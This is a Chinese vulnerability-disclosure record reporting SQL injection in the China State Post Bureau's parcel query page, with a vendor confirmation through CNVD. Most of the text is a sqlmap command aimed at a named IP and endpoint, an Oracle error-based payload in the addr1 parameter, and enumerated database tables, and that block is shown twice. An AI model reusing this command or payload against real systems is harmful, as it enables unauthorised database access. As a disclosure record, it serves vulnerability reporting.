漏洞详情

披露状态:

2014-03-10: 细节已通知厂商并且等待厂商处理中
2014-03-15: 厂商已经确认,细节仅向厂商公开
2014-03-25: 细节向核心白帽子及相关领域专家公开
2014-04-04: 细节向普通白帽子公开
2014-04-14: 细节向实习白帽子公开
2014-04-24: 细节向公众公开

简要描述:

中华人民共和国国家邮政局 SQL注射 SQLMAP 验证

详细说明:

http://www.spb.gov.cn/folder9/folder2047/index.html

包裹查询功能

normal01.png



normal02.png



然后SQLMAP试着跑表

C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables



sqlmap identified the following injection points with a total of 46 HTTP(s) requests:

---

Place: POST

Parameter: addr1

Type: error-based

Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)

Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1

---

web application technology: JSP

back-end DBMS: Oracle

Database: EXFSYS

[1 table]

+--------------------------------+

| RLM$PARSEDCOND |

+--------------------------------+



Database: OLAPSYS

[9 tables]

+--------------------------------+

| CWM2$AWCUBECREATEACCESS |

| CWM2$AWDIMCREATEACCESS |

| CWM2$_AW_NEXT_TEMP_CUST_MEAS |

| CWM2$_AW_TEMP_CUST_MEAS_MAP |

| CWM2$_TEMP_VALUES |

| OLAP_SESSION_CUBES |

| OLAP_SESSION_DIMS |

| XML_LOAD_LOG |

| XML_LOAD_RECORDS |

+--------------------------------+



Database: EXPRESS

[38 tables]

+--------------------------------+

| F_AREAMEM_IN |

| F_AREAMEM_IN_HIS |

| F_AREAMEM_IN_TEM |

| F_AREAMEM_OUT |

| F_AREAMEM_OUT_HIS |

| F_AREAMEM_OUT_TEM |

| F_AREAMEM_OUT__ |

| F_AREA_IN |

| F_AREA_IN_HIS |

| F_AREA_IN_TEM |

| F_AREA_OUT |

| F_AREA_OUT_HIS |

| F_AREA_OUT_TEM |

| F_ARRAY |

| F_ARRAY_HIS |

| F_ARRAY_TEM |

| F_CPY |

| F_PROD |

| LOG_EXPRESS |

| LOG_EXPRESS_STAT |

| LOG_PACKAGE |

| LOG_PACKAGE_STAT |

| LOG_SYS_OPT |

| PBCATCOL |

| PBCATEDT |

| PBCATFMT |

| PBCATTBL |

| PBCATVLD |

| PC2DIST |

| PK_AREAMEM |

| PK_AREAS |

| PK_ARRAY |

| S_CITY |

| S_DIST |

| S_FIELDVALUE |

| S_PROV |

| S_QUERY_TYPE |

| TEST |

+--------------------------------+



Database: SYSTEM

[8 tables]

+--------------------------------+

| DEF$_TEMP$LOB |

| HELP |

| MVIEW$_ADV_INDEX |

| MVIEW$_ADV_OWB |

| MVIEW$_ADV_PARTITION |

| OL$ |

| OL$HINTS |

| OL$NODES |

+--------------------------------+



Database: SYS

[30 tables]

+--------------------------------+

| DUAL |

| AUDIT_ACTIONS |

| AW$AWCREATE |

| AW$AWCREATE10G |

| AW$AWMD |

| AW$AWREPORT |

| AW$AWXML |

| AW$EXPRESS |

| IMPDP_STATS |

| KU$NOEXP_TAB |

| ODCI_SECOBJ$ |

| ODCI_WARNINGS$ |

| OLAPI_HISTORY |

| OLAPI_IFACE_OBJECT_HISTORY |

| OLAPI_IFACE_OP_HISTORY |

| OLAPI_MEMORY_HEAP_HISTORY |

| OLAPI_MEMORY_OP_HISTORY |

| OLAPI_SESSION_HISTORY |

| OLAPTABLEVELS |

| OLAPTABLEVELTUPLES |

| OLAP_OLEDB_FUNCTIONS_PVT |

| OLAP_OLEDB_KEYWORDS |

| OLAP_OLEDB_MDPROPS |

| OLAP_OLEDB_MDPROPVALS |

| PLAN_TABLE$ |

| PSTUBTBL |

| STMT_AUDIT_OPTION_MAP |

| SYSTEM_PRIVILEGE_MAP |

| TABLE_PRIVILEGE_MAP |

| WRI$_ADV_ASA_RECO_DATA |

+--------------------------------+



Database: MDSYS

[36 tables]

+--------------------------------+

| OGIS_GEOMETRY_COLUMNS |

| OGIS_SPATIAL_REFERENCE_SYSTEMS |

| SDO_COORD_AXES |

| SDO_COORD_AXIS_NAMES |

| SDO_COORD_OPS |

| SDO_COORD_OP_METHODS |

| SDO_COORD_OP_PARAMS |

| SDO_COORD_OP_PARAM_USE |

| SDO_COORD_OP_PARAM_VALS |

| SDO_COORD_OP_PATHS |

| SDO_COORD_REF_SYS |

| SDO_COORD_SYS |

| SDO_CS_SRS |

| SDO_DATUMS |

| SDO_DATUMS_OLD_SNAPSHOT |

| SDO_ELLIPSOIDS |

| SDO_ELLIPSOIDS_OLD_SNAPSHOT |

| SDO_GEOR_PLUGIN_REGISTRY |

| SDO_GEOR_XMLSCHEMA_TABLE |

| SDO_GR_MOSAIC_0 |

| SDO_GR_MOSAIC_1 |

| SDO_GR_MOSAIC_2 |

| SDO_GR_MOSAIC_3 |

| SDO_GR_RDT_1 |

| SDO_PREFERRED_OPS_SYSTEM |

| SDO_PREFERRED_OPS_USER |

| SDO_PRIME_MERIDIANS |

| SDO_PROJECTIONS_OLD_SNAPSHOT |

| SDO_TOPO_DATA$ |

| SDO_TOPO_RELATION_DATA |

| SDO_TOPO_TRANSACT_DATA |

| SDO_TXN_IDX_DELETES |

| SDO_TXN_IDX_EXP_UPD_RGN |

| SDO_TXN_IDX_INSERTS |

| SDO_UNITS_OF_MEASURE |

| SDO_XML_SCHEMAS |

+--------------------------------+



Database: CTXSYS

[3 tables]

+--------------------------------+

| DR$NUMBER_SEQUENCE |

| DR$OBJECT_ATTRIBUTE |

| DR$POLICY_TAB |

+--------------------------------+



Database: WMSYS

[4 tables]

+--------------------------------+

| WM$NEXTVER_TABLE |

| WM$VERSION_HIERARCHY_TABLE |

| WM$VERSION_TABLE |

| WM$WORKSPACES_TABLE |

+--------------------------------+



漏洞证明:

C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables



sqlmap identified the following injection points with a total of 46 HTTP(s) requests:

---

Place: POST

Parameter: addr1

Type: error-based

Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)

Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1

---

web application technology: JSP

back-end DBMS: Oracle

Database: EXFSYS

[1 table]

+--------------------------------+

| RLM$PARSEDCOND |

+--------------------------------+



Database: OLAPSYS

[9 tables]

+--------------------------------+

| CWM2$AWCUBECREATEACCESS |

| CWM2$AWDIMCREATEACCESS |

| CWM2$_AW_NEXT_TEMP_CUST_MEAS |

| CWM2$_AW_TEMP_CUST_MEAS_MAP |

| CWM2$_TEMP_VALUES |

| OLAP_SESSION_CUBES |

| OLAP_SESSION_DIMS |

| XML_LOAD_LOG |

| XML_LOAD_RECORDS |

+--------------------------------+



Database: EXPRESS

[38 tables]

+--------------------------------+

| F_AREAMEM_IN |

| F_AREAMEM_IN_HIS |

| F_AREAMEM_IN_TEM |

| F_AREAMEM_OUT |

| F_AREAMEM_OUT_HIS |

| F_AREAMEM_OUT_TEM |

| F_AREAMEM_OUT__ |

| F_AREA_IN |

| F_AREA_IN_HIS |

| F_AREA_IN_TEM |

| F_AREA_OUT |

| F_AREA_OUT_HIS |

| F_AREA_OUT_TEM |

| F_ARRAY |

| F_ARRAY_HIS |

| F_ARRAY_TEM |

| F_CPY |

| F_PROD |

| LOG_EXPRESS |

| LOG_EXPRESS_STAT |

| LOG_PACKAGE |

| LOG_PACKAGE_STAT |

| LOG_SYS_OPT |

| PBCATCOL |

| PBCATEDT |

| PBCATFMT |

| PBCATTBL |

| PBCATVLD |

| PC2DIST |

| PK_AREAMEM |

| PK_AREAS |

| PK_ARRAY |

| S_CITY |

| S_DIST |

| S_FIELDVALUE |

| S_PROV |

| S_QUERY_TYPE |

| TEST |

+--------------------------------+



Database: SYSTEM

[8 tables]

+--------------------------------+

| DEF$_TEMP$LOB |

| HELP |

| MVIEW$_ADV_INDEX |

| MVIEW$_ADV_OWB |

| MVIEW$_ADV_PARTITION |

| OL$ |

| OL$HINTS |

| OL$NODES |

+--------------------------------+



Database: SYS

[30 tables]

+--------------------------------+

| DUAL |

| AUDIT_ACTIONS |

| AW$AWCREATE |

| AW$AWCREATE10G |

| AW$AWMD |

| AW$AWREPORT |

| AW$AWXML |

| AW$EXPRESS |

| IMPDP_STATS |

| KU$NOEXP_TAB |

| ODCI_SECOBJ$ |

| ODCI_WARNINGS$ |

| OLAPI_HISTORY |

| OLAPI_IFACE_OBJECT_HISTORY |

| OLAPI_IFACE_OP_HISTORY |

| OLAPI_MEMORY_HEAP_HISTORY |

| OLAPI_MEMORY_OP_HISTORY |

| OLAPI_SESSION_HISTORY |

| OLAPTABLEVELS |

| OLAPTABLEVELTUPLES |

| OLAP_OLEDB_FUNCTIONS_PVT |

| OLAP_OLEDB_KEYWORDS |

| OLAP_OLEDB_MDPROPS |

| OLAP_OLEDB_MDPROPVALS |

| PLAN_TABLE$ |

| PSTUBTBL |

| STMT_AUDIT_OPTION_MAP |

| SYSTEM_PRIVILEGE_MAP |

| TABLE_PRIVILEGE_MAP |

| WRI$_ADV_ASA_RECO_DATA |

+--------------------------------+



Database: MDSYS

[36 tables]

+--------------------------------+

| OGIS_GEOMETRY_COLUMNS |

| OGIS_SPATIAL_REFERENCE_SYSTEMS |

| SDO_COORD_AXES |

| SDO_COORD_AXIS_NAMES |

| SDO_COORD_OPS |

| SDO_COORD_OP_METHODS |

| SDO_COORD_OP_PARAMS |

| SDO_COORD_OP_PARAM_USE |

| SDO_COORD_OP_PARAM_VALS |

| SDO_COORD_OP_PATHS |

| SDO_COORD_REF_SYS |

| SDO_COORD_SYS |

| SDO_CS_SRS |

| SDO_DATUMS |

| SDO_DATUMS_OLD_SNAPSHOT |

| SDO_ELLIPSOIDS |

| SDO_ELLIPSOIDS_OLD_SNAPSHOT |

| SDO_GEOR_PLUGIN_REGISTRY |

| SDO_GEOR_XMLSCHEMA_TABLE |

| SDO_GR_MOSAIC_0 |

| SDO_GR_MOSAIC_1 |

| SDO_GR_MOSAIC_2 |

| SDO_GR_MOSAIC_3 |

| SDO_GR_RDT_1 |

| SDO_PREFERRED_OPS_SYSTEM |

| SDO_PREFERRED_OPS_USER |

| SDO_PRIME_MERIDIANS |

| SDO_PROJECTIONS_OLD_SNAPSHOT |

| SDO_TOPO_DATA$ |

| SDO_TOPO_RELATION_DATA |

| SDO_TOPO_TRANSACT_DATA |

| SDO_TXN_IDX_DELETES |

| SDO_TXN_IDX_EXP_UPD_RGN |

| SDO_TXN_IDX_INSERTS |

| SDO_UNITS_OF_MEASURE |

| SDO_XML_SCHEMAS |

+--------------------------------+



Database: CTXSYS

[3 tables]

+--------------------------------+

| DR$NUMBER_SEQUENCE |

| DR$OBJECT_ATTRIBUTE |

| DR$POLICY_TAB |

+--------------------------------+



Database: WMSYS

[4 tables]

+--------------------------------+

| WM$NEXTVER_TABLE |

| WM$VERSION_HIERARCHY_TABLE |

| WM$VERSION_TABLE |

| WM$WORKSPACES_TABLE |

+--------------------------------+

修复方案:

把邮局关掉吧,下线不必要的网站

版权声明:转载请注明来源 lxj616@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-03-15 20:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向国家某信息安全协调机构上报。

最新状态:

暂无


漏洞评价: